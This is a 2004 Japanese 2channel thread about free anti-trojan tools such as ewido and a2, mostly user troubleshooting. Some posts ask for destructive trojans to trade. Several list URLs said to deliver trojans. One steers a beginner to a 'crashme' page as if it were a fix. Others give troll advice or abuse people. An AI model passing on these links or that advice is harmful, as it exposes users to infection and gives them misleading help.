132 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:53: 先ほどバスター2004でスキャンしたら、ついい初めてトロイに感染しているとの事、
ファイルは5個なんだけども、そのファイルを削除しようとしても、winが使っています
ので削除できませんと出て、この先をどうしたらよいのか分かりません、
場所はc\win\system\edey_dtzi.exeなんですが、削除しようと右クリック削除で
削除できません、winが使っていますと出ます、他にもダウンロードプログラム
フォルダーにもありますが、いずれも削除できませんと出ます、何か良い方法は
有りませんでしょうか、ちなみに、win98se、ZONEアラームのみでウィルスソフトは
入れていませんでした、4年間感染は無かったのに・・・・・・。
133 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:54: >>132
>先ほどバスター2004でスキャンしたら、
何故ウィルスバスターのスレで聞かないのさ。
こっちとマルチにならないよう、誘導された旨を加えてバスタースレへGO
134 ：名無しさん＠お腹いっぱい。 ：04/08/05 20:32: ewido(・∀・)ｲｲ!!
フリーでも常駐してくれ
135 ：名無しさん＠お腹いっぱい。 ：04/08/05 20:48: 今日の昼にプロバイダーから電話があって「別のユーザーからスパムメールが
きたと通報があってIPアドレスしらべたらお宅のPCでした。たぶんウィルス
に感染してるはずですので調べてください」といわれました。

トレンドマイクロのHPでスキャンしたらでてくるわでてくるわトロイの木馬系の
ウィルスが６箇所にはいってました。４個は駆除、削除できましたが２個が
「アクセス不可」になってました。プロバイダーがいうにはアクセス不可の
場合はPCを再インストールしていただかなければ除去できませんといわれました。

そこでPCの再インストに取り掛かりましたがなぜか途中で止まって作業でき
ませんでした。感じとしてはHDがウィルス感染で壊されたようにおもうの
ですがそのようなケースってあるのでしょうか？

どなたかご教授いただければ幸いです。
136 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:24: >>128
＞a2のスレはどちらかというと先走りで立てて、
立てる事の是非はともかく、立ったのはこのスレでかなり語りつくされてから。
専用スレを立てるのなら遅かったのではないかと。
>>127
＞ewido単独スレってないんだな。
単独スレを立てようかと思ったこともあるが、
このスレでやれば良いだろうと思ったのと
あまり語る事もないんじゃないか（私が詳しく語れない）と思い、
立てなかった。
>>131
a2もこのスレでやって良いと思う。というか色々な人がやってるし。
>>134
同意。
何かフリーで常駐してくれる開発終了していないアンチトロイソフトないかなあ。
SSMとRegistry Protとteatimer（spybotの付属機能）使っているから別にいらないといえばいらないんだが、
常駐保護もスキャンもできるフリーソフトを使ってみたい。
137 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:26: >>135
ない
ノートンがMBRを監視しているから、ノートンを消せ
138 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:26: ewido + avast!
数時間しか経っていないけど今のところ問題なし。
リブートも異常無し。このまま１４日間様子みまつ
( ewido の security status は 100% です)
139 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:30: >>135もウィルスバスタースレのテンプレのウィルス情報検索してみろ。
大体はそのウィルス情報を見てやれば解決するはず。
140 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:33: >>136
Ewidoも、a2も、日本語の解説ページらしいものがないんだよね。
俺はXPではないのでa2のみですが、満足できるレベルですよ。
非常駐だから不具合置きにくいし、無料ソフトなんだから、もっと他の人も入れるべきだよ。
141 ：96 ：04/08/05 21:42: 新しいバージョンが出たと聞いたのでもしかしたら直るかな、と
思ってインストールしたのですが、直りませんでした（全てのボタンの文字が空白）。
このままでは口惜しいのでググったりしてやっと解決しました。
同じ症状になる人は滅多にいないとは思いますが、なってしまった時は参考にして下さい。
（OSはXPです）

セーフモードで起動してC:\WINDOWS\system32\FNTCACHE.DATを削除後、再起動。
これで直ります。新しいバージョンが出なければあきらめていたところでした。
これでひと安心です。
142 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:42: >>140
私は両方使っているが
a2はメールアドレス登録が面倒と思う人もいるのかも。
ewidoはXPのみなのがネックなのかも。

最大のネックは知名度か。
アンチトロイソフトそのものの知名度も低いしねぇ。
143 ：名無しさん＠お腹いっぱい。 ：04/08/05 21:54: ewido、14日経つとfreeになるって云うから常駐なしでインスコして、
なかなか良さげな感じなので、金払ってplusを本格採用するかと思い、
一度アンインスコしてから常駐ありでインスコしたら、
…freeになりますた。
再度アンインスコしてから常駐なしでインスコしてもfreeのまま。

流石に常駐相性チェックせずに導入する気は無いんで、このままfreeの悪寒。
金払う気がある香具師は、まず常駐ありでインスコする様に。
144 ：名無しさん＠お腹いっぱい。 ：04/08/05 22:08: >>142
たぶん、a2かewidoを日本語化したら爆発的に知名度あがりそうだね。
最近のスパイウェアは、トロイ絡みで感染するものが結構あるので、
アンチトロイソフトに関心を持っている人は少なくないはず。
ノートン先生やウィルスバスターでも案外トロイはスルーする。
145 ：名無しさん＠お腹いっぱい。 ：04/08/05 22:14: >>143
なんかアップデートで落とした場合はPlusになるっぽいよ。
Webからセットアップ落として入れたらFreeっぽ。
146 ：名無しさん＠お腹いっぱい。 ：04/08/05 22:28: 後Freeで使うならバックグラウンドガードはいらね。
Freeの場合オートアップデートだけだからスキャンの前に普通アップデートするし、
しかもその常駐ソフトはプロセス切る以外に終了できないから。
147 ：143 ：04/08/05 22:36: >>145
ewido初体験で、Webからセットアップ落として入れて、最初は常駐なしのPlusだったん。
アンインスコしてインスコし直したら、常駐ありのFreeになった。
で、再度アンインスコしてインスコし直して、常駐なしのFreeで使ってまふ。

>>146
かなり奇妙な常駐だよね。malwareによる妨害や他ソフトとの干渉を避けるためかもしれんけど。
148 ：145 ：04/08/05 22:40: >>147
あれ、俺も同じになっちまった。
どーなってんだこれ。
149 ：名無しさん＠お腹いっぱい。 ：04/08/05 23:32: 常駐切りつけてほしかったなぁ(´･ω･｀)
150 ：名無しさん＠お腹いっぱい。 ：04/08/05 23:44: >>149
君も再インストールして>>143 >>145の（・∀・）人（・∀・）ﾅｶｰﾏ

Free版だと、スキャンの機能やオプションも減ってんだよな…
151 ：名無しさん＠お腹いっぱい。 ：04/08/05 23:48: なんか、厨房ﾚｽうぜー
152 ：名無しさん＠お腹いっぱい。 ：04/08/06 00:51: 軽さではewido＞a2だな
153 ：名無しさん＠お腹いっぱい。 ：04/08/06 01:10: 7-ZipフォルダのBZip2.dllをPurity Scanとか抜かしてますね＞ewido
154 ：名無しさん＠お腹いっぱい。 ：04/08/06 16:28: ewido再インスコしたらSecurityStatus25％になった(´･ω･｀)
155 ：名無しさん＠お腹いっぱい。 ：04/08/06 17:00: ewido8/6うｐだて来てるな。既出か？
昨日はSecurityStatus0%だったのに25%になってる・・・。
156 ：名無しさん＠お腹いっぱい。 ：04/08/06 17:27: ewidoって頻繁にうｐだてするんだね
どのウィルスに対応してるのかわからんけどｗ
157 ：名無しさん＠お腹いっぱい。 ：04/08/06 17:28: Your security statusの内訳は、updateすることで25%、
常駐のFile Monitoring、Hijacker Protection、Automatic Updatesを有効にすることで各25%。
158 ：名無しさん＠お腹いっぱい。 ：04/08/06 17:52: >>157
ﾍｪｰじゃあんま意味無いってことか。
159 ：名無しさん＠お腹いっぱい。 ：04/08/06 20:57: MS_Windows_LSASS_RPC_DS_Request
MS_RPC_DCOM_Heap_BO
という攻撃を頻繁に食らうのですが対処方法はありますでしょうか？
160 ：名無しさん＠お腹いっぱい。 ：04/08/06 21:04: MS_Windows_LSASS_RPC_DS_Request
MS_RPC_DCOM_Heap_BO
という攻撃を頻繁に食らうのですが対処方法はありますでしょうか？
161 ：名無しさん＠お腹いっぱい。 ：04/08/06 21:18: 防ぐならファイアーウォールでいいんじゃないの
162 ：名無しさん＠お腹いっぱい。 ：04/08/06 21:34: ewido新Verにしたら、AviUtlが立ち上がんなくなった(´･ω･｀)
163 ：名無しさん＠お腹いっぱい。 ：04/08/06 23:38: Windows Massengerに寄生するトロイってあったけ？
なんか科学技術警察だっけ？そこんとこにつなぎにいこうとしているんだが？
変なパケット送ってるのかもしれん。。。
164 ：名無しさん＠お腹いっぱい。 ：04/08/08 02:03: うほっ、ewidoをアップデートしたら再起動を要求してきた
165 ：名無しさん＠お腹いっぱい。 ：04/08/08 02:50: >>164
うほっ、乙
で、再起動までしてどう変わった？
166 ：名無しさん＠お腹いっぱい。 ：04/08/08 12:50: アンチトロイソフトって、
ウィルスソフトのトロイ駆除に焦点をしぼったバージョンと考えて
モウマンタイでしょうか？

これ使えばほぼ駆除できますか？
167 ：名無しさん＠お腹いっぱい。 ：04/08/08 13:52: >>166
>ウィルスソフトのトロイ駆除に焦点をしぼったバージョンと考えて
トロイの木馬・スパイウェア・ワーム等（以後malware）の「検出」に焦点を合わせて製品開発してると思われる。
一般的なウイルス対策ソフトに比べてmalwareの検出率は高いと考えられている。

>これ使えばほぼ駆除できますか？
感染しただけで復旧不能の致命的なダメージを与えるmalwareもあるし、
駆除できるmalwareであっても手作業を要するものが最近は増えている。
また、malwareごとに「○○を駆除するには××」「△△を駆除するには□□」といった感じで
特定のアンチトロイソフト・アンチスパイソフトが必要になる事も多い。

ウイルス対策でもそうだが、初心者は「感染しても駆除すればOK」という甘い考えを捨てろ。
感染したら基本的に手遅れ（重要データ流出・感染被害拡大・システム破壊・信用失墜）で、
仮に駆除できたとしても、それはたまたま運が良かっただけだ。

そもそも、この世の全てのアンチトロイソフト・アンチスパイソフトを併用したとしても、
全てのmalwareを「検出」できるとは限らない。「駆除」じゃなくて「検出」な。

「怪しいサイトに行かない」「怪しいソフトを使わない」「怪しいメールは開かない」
アンチトロイソフト・アンチスパイソフトを導入する前に、それらの原則から見直せ。
168 ：名無しさん＠お腹いっぱい。 ：04/08/08 13:54: Kaspersky使えば良い事じゃないの？
169 ：名無しさん＠お腹いっぱい。 ：04/08/08 14:02: >>168
Kasperskyは、ウイルス対策ソフトの中ではトロイの検出「率」が高いけど、
全てのトロイを検出するわけじゃないし、アンチトロイに比べたら・・・だ。

勿論、ウイルス対策ソフト選びなら、確実に上位候補となる製品だがな。
170 ：名無しさん＠お腹いっぱい。 ：04/08/08 16:41: >>169
ハァ？　どんなアンチトロイより検出率は上ですが？
171 ：名無しさん＠お腹いっぱい。 ：04/08/08 16:47: >>169の文脈から、どうしたらKesperskyがアンチトロイソフトよりも
検出力が上だと書いてあるように読み取れるんだろうか
172 ：名無しさん＠お腹いっぱい。 ：04/08/08 17:06: ノロイの木馬にやられたんですが、どうすればいいですか？
173 ：名無しさん＠お腹いっぱい。 ：04/08/08 17:40: >>171
読解力テスト０点
174 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:08: すごい凶悪なトロイの木馬落とせるとこない？ＯＳアンインストールするのでパソコンで実験してみたいんだけど
175 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:08: >>171
>>169は「アンチトロイが上」>>170は「Kasperskyが上」と主張している。
双方とも具体的根拠を提示していないので妥当性は評価できない。

にわかにKaspersky信者（を装った荒らし）が台頭してきたな。
ま、トロイ対策ソフトは通常、ウイルス対策ソフトとの併用を念頭に置いてるんで、
そんなにKasperskyが好きならKasperskyと併用するのが良かろう。
Kasperskyだけで十分だと思うならそれも良し。そんなのは使う奴の勝手だからな。

>>172
宗教板で解呪方法を聞くか、オーバークロックで乗り切れ。
176 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:11: >>174
どうせ他人に送りつける事は目に見えてるから、誰も紹介しない。
177 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:14: Baios破壊する奴が欲しいんだけどないねぇ、どうやって手に入れるんだろ、自作？？
ＨＤＤ1kb上書きじゃつまらんでしょ
178 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:15: 研究のために、誰かうｐよろしくお願いすます。
179 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:20: 誰かもってる人いたらください＾－＾、こちらのもあげます。
medicate9@yahoo.co.jp
180 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:20: >>175
カスペがトロイに強いなんて常識じゃないの？
海外のサイトのテスト結果なんて幾らでもあるだろ。
181 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:28: Kasperskyがトロイに強いのは事実
ただし、ここで紹介しているアンチトロイソフトは大半は非常駐のもの（常駐型のもあるが）
非常駐のアンチトロイソフトと、Kasperskyならば同時に併用すりゃいいだけ

Kasperskyの宣伝でしたら、ご自分のスレかアンチウィルスソフト比較スレでどうぞ。
ここではスレ違いです。
182 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:29: ttp://www.rokop-security.de/main/article.php?sid=748

Backdoor Zoo - 100%
verbreitete Trojaner - 100%
Backdoors laufzeitkomprimiert - 97%
Macroviren - 100%
verbreitete Wurmer ? 100%
Dialer - 88%
Fehlalarme - 0

まあ確かにトロイ含め検出力は高いよな。
ESET辺りだとアンチトロイとの併用も考えた方が良いと思うけど。
183 ：名無しさん＠お腹いっぱい。 ：04/08/08 18:37: >>181
逆にここの非常駐のアンチトロイの検出力ってどんなものなのかな
184 ：名無しさん＠お腹いっぱい。 ：04/08/08 19:03: というより、忍び込まれた時点で終わってるだろ。常駐しなきゃ何の意味もない。
ヤバいのが見つかったらどのみちOS入れ直す覚悟でいるから定期スキャンは
確認の意味でしかない。FWのほうがよっぽど重要だよ。
185 ：名無しさん＠お腹いっぱい。 ：04/08/08 19:04: トロイスキャンテストでは、古いものだったら↓にある。
最近のトロイテスト結果を出しているところを誰か知らないか？

http://www.pcflank.com/art26d.htm
http://www.rokop-security.de/main/article.php?sid=473
186 ：名無しさん＠お腹いっぱい。 ：04/08/08 19:08: >>185
アンチトロイよりアンチウィルスの方が上じゃん。
187 ：名無しさん＠お腹いっぱい。 ：04/08/08 19:20: >>186
というか、無料で非常駐だから併用シヨーヨっていう使い方だから、
アンチトロイとアンチウィルスの上下決めてもあんま意味ないんじゃないか？
アンチウィルスソフト入れない人なんてあり得ないわけだし。
188 ：名無しさん＠お腹いっぱい。 ：04/08/08 21:23: NOD32beta＋ewido+eScan AntiVirus Toolkit Utility使ってる。
Kaspersky以外のアンチウィルス使ってる人は、
弱い部分を補う意味でもアンチトロイ入れてもいいと思う。
189 ：BBk ：04/08/08 21:50: ToRoI Buster作者です。
このソフト、感染してから検知するシステムなんですが、、これって駄目ですかねぇ…
190 ：名無しさん＠お腹いっぱい。 ：04/08/08 21:56: >>189
最低　レジストリの修復もちゃんと出来るのかよ？
191 ：名無しさん＠お腹いっぱい。 ：04/08/08 21:57: >>189
ttp://www.vector.co.jp/soft/win95/util/se161033.html
これの作者さんですか？

やぁ(´･ω･`)　ようこそ、２ちゃんねるへ。
このトロイはサービスだから、まずインストールして落ちついて聞いて欲しい。（以下略）
192 ：名無しさん＠お腹いっぱい。 ：04/08/08 22:31: >>189
公開年月を考えると、先見の明があったと言えるなｗ
早期発見という意味では、かなり大きな効果が得られると思う。

しかし、例えばSSMのような総合監視ソフトがフリーで出てるし、
最近のトロイ・スパイ対策ソフトも常駐監視の対象にしてる様だ。
本気でセキュリティ対策を考えてるユーザーには必要ないかもな。

とはいえ、セキュリティに疎いユーザーほど効果を発揮しそうなんで、
例えばスタートアップフォルダ監視機能なんかを追加して
download板あたりで売り込んだら結構普及するかもな。
193 ：名無しさん＠お腹いっぱい。 ：04/08/08 22:36: >>189
個人的には、ny関係のトロイに特化したりなんかすると、かなり良いと思いますよ。
ユーザーの中心は日本人でしょうし、その日本人の中でトロイに最も感染しやすいのは
やっぱりny使っている人でしょうし。
たぶん、どのアンチウィルスベンダーも、どのアンチトロイベンダーも、
ny関連のは対応が後手後手に回っている気がしますから。
194 ：名無しさん＠お腹いっぱい。 ：04/08/08 23:28: >>189
ny、トロイに限らずなんだが、指定したよく使うダウンロード専用フォルダ（２，３こ）のみ
常駐監視してくれるソフトがあったらいいと思う。

全部監視するより軽くなるし、そこでのファイルの実行頻度は高いと思うから
195 ：名無しさん＠お腹いっぱい。 ：04/08/08 23:38: 他の入れても干渉しないのがいいな
軽さもキボン
196 ：BBk ：04/08/08 23:42: 当時はVirusBuster等でトロイの木馬の発見は出来ても除去が出来ませんでした。その点を補ったつもりです。

・レジストリCURRENT_USERに対応していません。
・監視するのはプログラムではなく、スタートアップルーチンです。
・スタートアップフォルダの監視に対応していません。

ダメダメですね…

http://members.tripod.com/iknat/
197 ：名無しさん＠お腹いっぱい。 ：04/08/09 03:15: むしろny支援ソフトにして
198 ：名無しさん＠お腹いっぱい。 ：04/08/10 11:07: トロピカルスキャナーのオンラインチェックを行って、下のような結果が出たのですけど
この結果は感染してないってことで安心していいのでしょうか？

Starting scan at 10:37:31:640...
Scan Memory
Memory not infected
Scan folder: 'C:\', recursive
Unable to scan C:\System Volume Information - アクセスが拒否されました。
Scan folder: 'C:\Documents and Settings\All Users\Documents', recursive
Scan folder: 'C:\Documents and Settings\???\My Documents', recursive
Scan folder: 'C:\Documents and Settings\？\My Documents', recursive
Finished scan at 10:52:34:796
Total number of files is 57854, number of infected files is 0
Average files per second is 64, average file size is 3725964
199 ：名無しさん＠お腹いっぱい。 ：04/08/10 11:16: >>198
この程度の英語も読めないなら使うのやめとけ。或いは翻訳ソフトでも使え。
200 ：名無しさん＠お腹いっぱい。 ：04/08/11 01:54: いまさっきトロイを手動で削除しました
201 ：名無しさん＠お腹いっぱい。 ：04/08/11 21:38: ewidoの自動アップデート後は常駐するようになって、
DAEMONにイメージをマウントするとOS落ちた。
202 ：名無しさん＠お腹いっぱい。 ：04/08/12 02:28: ewidoの対応ウィルス表ってありますか?
203 ：名無しさん＠お腹いっぱい。 ：04/08/14 04:34: >>201はXPね。
204 ：名無しさん＠お腹いっぱい。 ：04/08/14 07:27: http://ex8.2ch.net/test/read.cgi/base/1090684152/
205 ：名無しさん＠お腹いっぱい。 ：04/08/15 03:50: トロイに感染してしまい、どうすべかと思っていたが、このスレでewidoを知り
無事に駆除できました。べつにそんなつもりじゃないだろうけど、このスレに
感謝感謝。それにしてもewidoってごっついさわやかなインターフェイスだな。
206 ：名無しさん＠お腹いっぱい。 ：04/08/16 00:02: 助けてください、友達から変なスクリーンセーバーもらったら壁紙が起動するたびに変な貝殻みたな絵になります。
これは別にどうでもいいのですがctr＋alt＋deleteができなくなってしまって微妙に不便ですし他にパソコンに影響がないかどうか不安で仕方がありません。
過去ログを見てもそれらしき報告があっても直し方書いてないし、winny版とかいうところにも直し方書いてありませんでした。
お願いです、直し方教えてください。
207 ：名無しさん＠お腹いっぱい。 ：04/08/16 00:19: >>206
マルチ！
208 ：名無しさん＠お腹いっぱい。 ：04/08/16 07:52: >>206
MS Officeをアンインストールしてから入れ直せば直る。
209 ：名無しさん＠お腹いっぱい。 ：04/08/16 16:57: ny支援祖父となんて言ったらﾀｲｰﾎされかねない
たとえありえなくても、どうなるかはわからない。
210 ：名無しさん＠お腹いっぱい。 ：04/08/16 22:36: ewideの常駐って切れないの？
別に常に見張ってくれなくてもいいのだが……。
211 ：名無しさん＠お腹いっぱい。 ：04/08/16 22:41: >>210
インストール時に常駐の有無を選択できる。インストール後は不明。
212 ：名無しさん＠お腹いっぱい。 ：04/08/16 22:48: ＯＳはＸＰです。ＡＶＧでスキャンすると、毎回Backdoor.Agent.Ｂ.Ａというのが検出
されるのですが、駆除できません。
ＯＳを入れなおしたほうがいいんでしょうか？他に方法はありますでしょうか？
213 ：名無しさん＠お腹いっぱい。 ：04/08/16 22:54: >211
そうか、インストール後は分かんないのか……。
どうもありがとう。アンインスコして常駐切ってみるよ。
214 ：名無しさん＠お腹いっぱい。 ：04/08/16 22:59: 厨が増えたな。
215 ：名無しさん＠お腹いっぱい。 ：04/08/17 16:04: ewide　うｐ
216 ：名無しさん＠お腹いっぱい。 ：04/08/19 02:49: ewideうｐだてするとYour update-account has expiredってでる
どうすればいいんだろ(´･ω･｀)
217 ：名無しさん＠お腹いっぱい。 ：04/08/19 03:15: 本当だ。一体どうしろと。
218 ：名無しさん＠お腹いっぱい。 ：04/08/19 12:33: 今日は繋がらない
219 ：名無しさん＠お腹いっぱい。 ：04/08/19 16:54: うｐだてｷﾀｷﾀｷﾀｷﾀ━━━(ﾟ∀ﾟ≡(ﾟ∀ﾟ≡ﾟ∀ﾟ)≡ﾟ∀ﾟ)━━━━!!!!!!!
220 ：名無しさん＠お腹いっぱい。 ：04/08/19 17:35: ewidoのサーバーが落ちてたのかな
今試してみたらちゃんとアップデートできて、ついでに再起動も要求してきた
221 ：名無しさん＠お腹いっぱい。 ：04/08/19 23:18: 再起動ってプログラムの再起動だよね？
222 ：名無しさん＠お腹いっぱい。 ：04/08/20 01:31: >>221
いやWindowsの再起動
223 ：名無しさん＠お腹いっぱい。 ：04/08/20 02:40: シグネーチャ更新しただけなら関係ないような。
常駐させてる人に対するメッセージじゃないの？
224 ：名無しさん＠お腹いっぱい。 ：04/08/20 15:14: ewido　うｐ
225 ：名無しさん＠お腹いっぱい。 ：04/08/21 02:11: ewido　頻繁にうｐしてるな
226 ：名無しさん＠お腹いっぱい。 ：04/08/21 03:21: >>223
こっちも常駐なしだがWinの再起動を要求された。
アンインストールのときも再起動要求されたしちょっと面倒くさくなってしまってる。
でも新しいバージョンになってからtranslation errorだっけか、でなくなったね。
227 ：名無しさん＠お腹いっぱい。 ：04/08/21 08:38: 以下のURLにトロイが仕込まれているとの事です

http://cgi.f8.aaacafe.ne.jp/~moeromoe/php/img/

どのような仕組みなのか調べようと思ったのですが、玉砕。
逆に感染してしまいました。

超ｴﾛい人、調べ方教えて
228 ：名無しさん＠お腹いっぱい。 ：04/08/21 09:08: >>227
興味本位の馬鹿はﾈｯﾄしなくていい。
229 ：名無しさん＠お腹いっぱい。 ：04/08/21 11:38: >>227
まず、回線切って首吊って氏ね。迷わず逝けよ、逝けばわかるさ。
230 ：名無しさん＠お腹いっぱい。 ：04/08/21 15:14: ｱﾘｶﾞﾄｰ!!
231 ：138 ：04/08/21 17:00: ewido、なんだかんだいって2週間過ぎても常駐してる
有効な機能は自動アップデートだけだけど
avast! との併用も今のところ特に問題なし
リストに入っているから当たり前と言えば当たり前なんだが
232 ：名無しさん＠お腹いっぱい。 ：04/08/21 19:27: うちはewido、eTrustAnitvirus、Outpost使ってる。
たまに起動時にewidoがポップアップ出そうとして落ちることがあるが
ほかは特に問題ないでつ。
233 ：名無しさん＠お腹いっぱい。 ：04/08/23 12:41: >>227
ttp://cgi.f8.aaacafe.ne.jp/~moeromoe/php/upload.php
ここから38KBのファイルを踏めばトロイのページに飛ぶやつだな。
234 ：名無しさん＠お腹いっぱい。 ：04/08/24 02:11: http://silentblue.hp.infoseek.co.jp/
235 ：名無しさん＠お腹いっぱい。 ：04/08/25 00:24: ewido　うｐ
236 ：名無しさん＠お腹いっぱい。 ：04/08/25 09:51: ttp://maichy.s1.x-beat.com/up/data/oo3653.jpg
こちらを踏んでしまいました。
恐らくトロイと呼ばれるものだと思うのですが
初心者の為、対処方法がわかりません。
ご教授お願いします。
237 ：マミー ：04/08/25 10:02: もんもす　　　　　　　　　　　　　　　　　　　　　　　　　　∧＿∧　
どすこいですけど　　　　　　　　∧＿∧　　　　～～～～　　　(゜д゜)
いいえわたしはわかりますから　　(´д｀) ∩－－∪＿　　　　□⊂　∪
だけどわかりますから　　　　　　(＿＿＿＿＿⊃＿＿＿⊃　　　　∪∪
だけどわたしはむりですよわたし
のことは　　　　　　　　　　　　∧∧
わかるのでいいです　　　　　　(＾＾)∩はい、わかります
　　　　　　　　　　　　　　　∪
　　　　　　　　　　　　　　　　∪∪　　
238 ：名無しさん＠お腹いっぱい。 ：04/08/25 11:05: >>236
>恐らくトロイ
へぇ、よく分かったね。
何が起こったのか書かないところをみると本当は踏んでいないんじゃないのかな？
239 ：名無しさん＠お腹いっぱい。 ：04/08/25 15:06: ウィルス検索をしたところ、
TROJ_ISTBAR.W
TROJ_REVOP.F
TROJ_DELF.AR
の３つが感染していました。トロイですよね？
初心者なのでどうやって治せばいいかわかりません。
どのアンチウィルスがいいのか教えてください。お願いします。
240 ：名無しさん＠お腹いっぱい。 ：04/08/25 15:13: >>239
お前がオンラインウィルス検索したのはどのソフトの会社だ？
その会社のスレッドで聞けよ。どうせトレンドマイクロだろ？
このスレの話題と関係ないじゃん。
241 ：名無しさん＠お腹いっぱい。 ：04/08/25 15:41: >>240
別にトレンドマイクロのアンチウィルスを使いたいんじゃないんです。
ただそこの検索を使っただけなので。
ウィルスを除去できれば、どこの会社でもいいんです。
242 ：名無しさん＠お腹いっぱい。 ：04/08/25 15:47: >>241
ここで紹介しているのは、アンチトロイウェアソフト。
ウィルスは駆除できない。トロイに対して特化しているからさ。
アンチウィルスソフト入れてないなら、そっちを探す方が先。
他のスレッド見て来い。無料のアンチウィルスソフトもいっぱいある。
243 ：名無しさん＠お腹いっぱい。 ：04/08/25 16:04: >>242
ありがとうございます。行って来ます。
244 ：名無しさん＠お腹いっぱい。 ：04/08/25 18:22: http://www.netarc.jp/viral-challenge/viral-event.html
トロイですか？
スパイウェアですか？
245 ：名無しさん＠お腹いっぱい。 ：04/08/26 00:50: はぁ？
246 ：名無しさん＠お腹いっぱい。 ：04/08/26 02:08: 以前トロイを仕掛けられたのですが、その後システムが逝かれて
リカバリーかけたのですが、その後もハードディスクに不良セクターがあり
修復できるのですが物理的に不具合があるみたいです
トロイORウィルスで物理的にハードディスクを破壊することって可能なのでしょうか？
ＰＣに詳しいからいましたら教えてくださいませ
よろしく。
247 ：名無しさん＠お腹いっぱい。 ：04/08/26 02:18: 物理的に破壊なんてまず有り得ないんじゃね？
なんにしても不良セクタが発生したならとっとと交換しる
248 ：246 ：04/08/26 03:05: >>247
そうですかレスありがトン
249 ：BBk ：04/08/26 23:56: http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MAILBOMB&VSect=T
250 ：名無しさん＠お腹いっぱい。 ：04/08/27 07:37: 警告来た！！！asvhost.exeなるものが！
251 ：名無しさん＠お腹いっぱい。 ：04/08/27 07:59: バスターもノートンも信用できなくなった。
双方とも msnmsg.exeを検出できなかった。SOPHOSでは8/19に対応が
終わっていたのにバスターは何の情報もなし。
結構きつい動きしていましたよ。まず起動時に、あるサイトに繋がって
トロイが入っているCABをダウンロードしてくる。
レジストリから情報を削除しても、タスクリストに載って活動していれば
レジストリ情報は復活する（まるでゾンビ）。
自分はウイルスとして検出されないから、トロイを消してもウイルス警告
がでる。初心者はほったらかしにして、変なパケットを流しまくり。
それを２４日に２台も駆除したんですよ。同業者で駆除できずにOS再インストール
というかバスターで引っかからないから駆除できないという理由だそうだが。
そんな同業者もどうかと思うが結局バスターが対応できていない事から
始まったW32/RBOT-GOお騒ぎ。お客さんにバスターを勧めることが出来なくなってしまって
本当に大弱りです。大体まじめにやっているのか、対応し切れているのか
が明らかになった私としては「大事件」です。６０００円とって対応しきれない
のであれば、金返せというところだ。
252 ：名無しさん＠お腹いっぱい。 ：04/08/27 08:35: >>251
トレンドのサイトをチェックしたら、米・仏では7/29に対応してるね
日本ではデータベースにないから未対応みたい

パターンファイルは世界共通と思いこんでいたが各国のウィルス
発生状況に応じて異なると言うことかねぇ
253 ：名無しさん＠お腹いっぱい。 ：04/08/27 11:52: >>251はマルチだよ
254 ：名無しさん＠お腹いっぱい。 ：04/08/27 12:10: >>252
trendmicroが7/29に対応したのは恐らく別の亜種。W32/RBOT-GOには対応してない。

あと、trendmicro日本語サイトがウイルス情報を網羅してないだけで、
trendmicro各国間でパターンファイルは共通と思われ。
255 ：名無しさん＠お腹いっぱい。 ：04/08/27 13:28: 昨日エロ掲示板でトロイ踏んじゃいました
当方mcafeeﾌﾟﾚｲﾝｽﾄ（2004年版）ウイルススキャンパーソナルファイアーウォールです
ウイルススキャンして一個削除したんですがこれで大丈夫なんでしょうか？
256 ：名無しさん＠お腹いっぱい。 ：04/08/27 13:38: >>255
スレに目を通すぐらいしろYO!!
257 ：名無しさん＠お腹いっぱい。 ：04/08/27 13:53: 255　
どこに逝ったらいいか教えて
258 ：名無しさん＠お腹いっぱい。 ：04/08/27 13:55: >>255
がんばれマカフィーPART10
http://pc5.2ch.net/test/read.cgi/sec/1090040195/
ただし、お前の質問は、答え返ってこないと思うけど。
何が聞きたいのかさっぱりわからない。
259 ：名無しさん＠お腹いっぱい。 ：04/08/27 13:56: ありがとう
逝ってきます
260 ：あぼーん ：あぼーん: あぼーん
261 ：ウィルスに怯える名無し ：04/08/28 02:47: どうやらいつの間にかトロイに感染してしまった模様
オンラインチェックしてみたところ

ｃ：WINDOWS\...\YBNC7T8P\sahra1725[1].jpg 　　　　ウイルス名　HTML/Suar

どうにかフリーウェアで対処したいところなんですが、
どこも英語だったり、説明が長かったりめんどくさいです。

はっきり言って自分の怠慢であるわけなんですが
どなたか親切な方どうしたら一番良いか教えて下さい…orz
262 ：名無しさん＠お腹いっぱい。 ：04/08/28 02:59: >>261
めんどうならばココを攻めろ
http://www.raus.de/crashme
263 ：名無しさん＠お腹いっぱい。 ：04/08/28 02:59: >>261 McAfee 使ってるんならそのまま駆除できないの？
264 ：ウィルスに怯える名無し ：04/08/28 03:09: >>263
ウイルスチェックしたあとに駆除ができたのかなフリーで

だとしたら怠慢しすぎだな俺、ちょっといってきますﾉｼ
265 ：名無しさん＠お腹いっぱい。 ：04/08/28 14:43: >>260
マジなら別のサイト逝け

騙りなら警察に逝け
266 ：名無しさん＠お腹いっぱい。 ：04/08/28 16:26: 【大人の時間】ってとこの【スポーツ画像】のなかの
｛【4:129】＠大山加奈のエロ画像ぎぼ～んんんんんんん＠｝の
━━━
117 ：名無しさん＠お腹いっぱい。：04/08/28 05:02 ID:9/P+AUzi
拾い物ですが赤外線カメラもの・・・

http://raus.de/crashme
http://www.strangeworld.info/upload/upload.php
http://asongfor.s13.xrea.com/x/up/files/ayutan0661.jpg
http://picopico.dip.jp/ragnarok/data/1073724070984_log.jpg
http://wonderful.at/2ch
━━━
全部で五つあるうちの三つ目に逝ったらトロイの木馬と言うものが襲ってきて
McAfeeがVirusScanして感染したのを削除しました　
初心者なんでこれ以上わかりません
これで元の元気なパソコンになりますか？教えていただきたい
